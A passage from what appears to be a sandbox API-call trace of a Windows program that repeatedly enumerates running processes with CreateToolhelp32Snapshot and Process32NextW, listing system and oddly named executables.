th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0147.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0147.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0147.504] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0147.505] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.507] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0147.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0147.509] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0147.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0147.512] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0147.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0147.514] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0147.515] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0147.516] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0147.517] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0147.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0147.519] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0147.520] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0147.521] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0147.522] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0147.611] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0147.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0147.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0147.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0147.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0147.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.617] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0147.618] CloseHandle (hObject=0xc4) returned 1 [0147.618] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0147.623] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0147.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0147.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0147.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0147.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0147.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0147.629] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0147.629] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.630] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.631] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.632] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.633] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.633] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0147.634] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.635] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.635] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0147.636] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.639] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0147.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0147.641] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0147.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.644] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0147.646] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0147.648] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0147.711] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0147.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0147.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0147.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0147.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0147.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0147.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0147.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0147.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0147.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0147.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0147.724] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0147.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0147.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0147.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0147.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0147.730] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0147.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.732] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0147.733] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0147.735] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0147.735] CloseHandle (hObject=0xbc) returned 1 [0147.736] Sleep (dwMilliseconds=0x12c) [0148.066] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0148.072] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.073] Process32NextW (in: 